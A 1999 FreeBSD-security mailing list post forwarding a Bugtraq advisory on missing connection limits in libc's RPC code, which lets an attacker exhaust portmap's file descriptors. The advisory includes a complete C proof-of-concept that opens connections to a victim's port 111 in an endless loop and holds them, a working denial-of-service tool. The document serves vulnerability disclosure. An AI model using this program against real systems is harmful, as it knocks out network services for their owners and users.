From owner-freebsd-security Thu Apr 15 12:58: 1 1999 Delivered-To: freebsd-security@freebsd.org Received: from vtopus.cs.vt.edu (vtopus.cs.vt.edu [128.173.40.24]) by hub.freebsd.org (Postfix) with ESMTP id B812D14C35 for ; Thu, 15 Apr 1999 12:57:48 -0700 (PDT) (envelope-from dhagan@vtopus.cs.vt.edu) Received: (from dhagan@localhost) by vtopus.cs.vt.edu (8.9.1a/8.9.1) id PAA06227 for freebsd-security@freebsd.org; Thu, 15 Apr 1999 15:55:26 -0400 (EDT) Date: Thu, 15 Apr 1999 15:55:24 -0400 (EDT) From: Daniel Hagan To: freebsd-security@freebsd.org Subject: KKIS.08041999.001.b - security raport - flaws in rpc part of libc (fwd) Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org ---------- Forwarded message ---------- Date: Wed, 14 Apr 1999 15:26:14 +0200 From: Lukasz Luzar To: BUGTRAQ@NETSPACE.ORG Subject: KKIS.08041999.001.b - security raport - flaws in rpc part of libc ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ### ### ### ### ### ### ### ### ### ### ###### ###### ### ### ### ### ### ### ### ### ### ### ### S E C U R I T Y ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Contacts ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ KKI Security Team Cracow Commercial Internet, Poland http://www.security.kki.pl http://www.kki.pl mailto:security@security.kki.pl mailto:biuro@kki.pl ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Informations ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Raport title : Lack of RPC's implementation in libc libraries and how it affects for example portmap. Problem found by : Lukasz Luzar (lluzar@security.kki.pl) Raport created by : Robert Pajak (shadow@security.kki.pl) Lukasz Luzar (lluzar@security.kki.pl) Problem found at : 08 April 1999 Raport published : 14 April 1999 Raport code : KKIS.08041999.001.b Short description : full description below Vulnerable versions : libc*, up to current. Platforms affected : Linux X.X, FreeBSD X.X, probably others... Patches : curently not available Archive : http://www.security.kki.pl/advisories/ Impact description : full description below Risk level : medium Notes : we were unable to contact with authors of libc ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Description ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ It seems that libc's RPC implementation does not check neither time of established connections, nor number of connected sockets. It is quite dangerous, because many network services is based on this functions. ~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Impact example ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Below there is ther program which shows how to make DoS of portmap (tcp) When max. limit of descriptors per process is not set, it could easly lead to haevy problems with victim's machine stability. (e.g. default sets on FreeBSD) When limit of open descriptors is reached, portmap begins to refuse all new connections. ~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Example sources ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ --- CUT HERE --- /* * example.c by Lukasz Luzar (lluzar@security.kki.pl) */ #include #include #include #include #include #include #define ADDR "10.0.0.1" // victim's IP address in dot notation #define PORT 111 // victim service to DoS eg. portmapper void main() { int sockfd, n = 0; struct sockaddr_in victim_addr; bzero((char *) &victim_addr, sizeof( victim_addr)); victim_addr.sin_family = AF_INET; victim_addr.sin_addr.s_addr=inet_addr( ADDR); victim_addr.sin_port = htons( PORT); fprintf( stdout, "Opening new connections...\n"); for(;;) { if(( sockfd = socket( AF_INET, SOCK_STREAM, 0)) < 0) { fprintf( stderr, "socket error at %d\n",n); break; } if( connect( sockfd,(struct sockaddr*) &victim_addr, sizeof( victim_addr)) < 0) { fprintf( stderr,"connect error at %d\n",n); break; } n++; } fprintf( stdout, "Established %d connections " "and waiting...\n", n); for(;;); } --- CUT HERE --- ~~~~~~~~~~~~~~~~~~~~~~~~[ Copyright statement ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Copyright (c) 1999 KKI Security Team, Poland All rights reserved. All questions please address to mailto:security@security.kki.pl ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message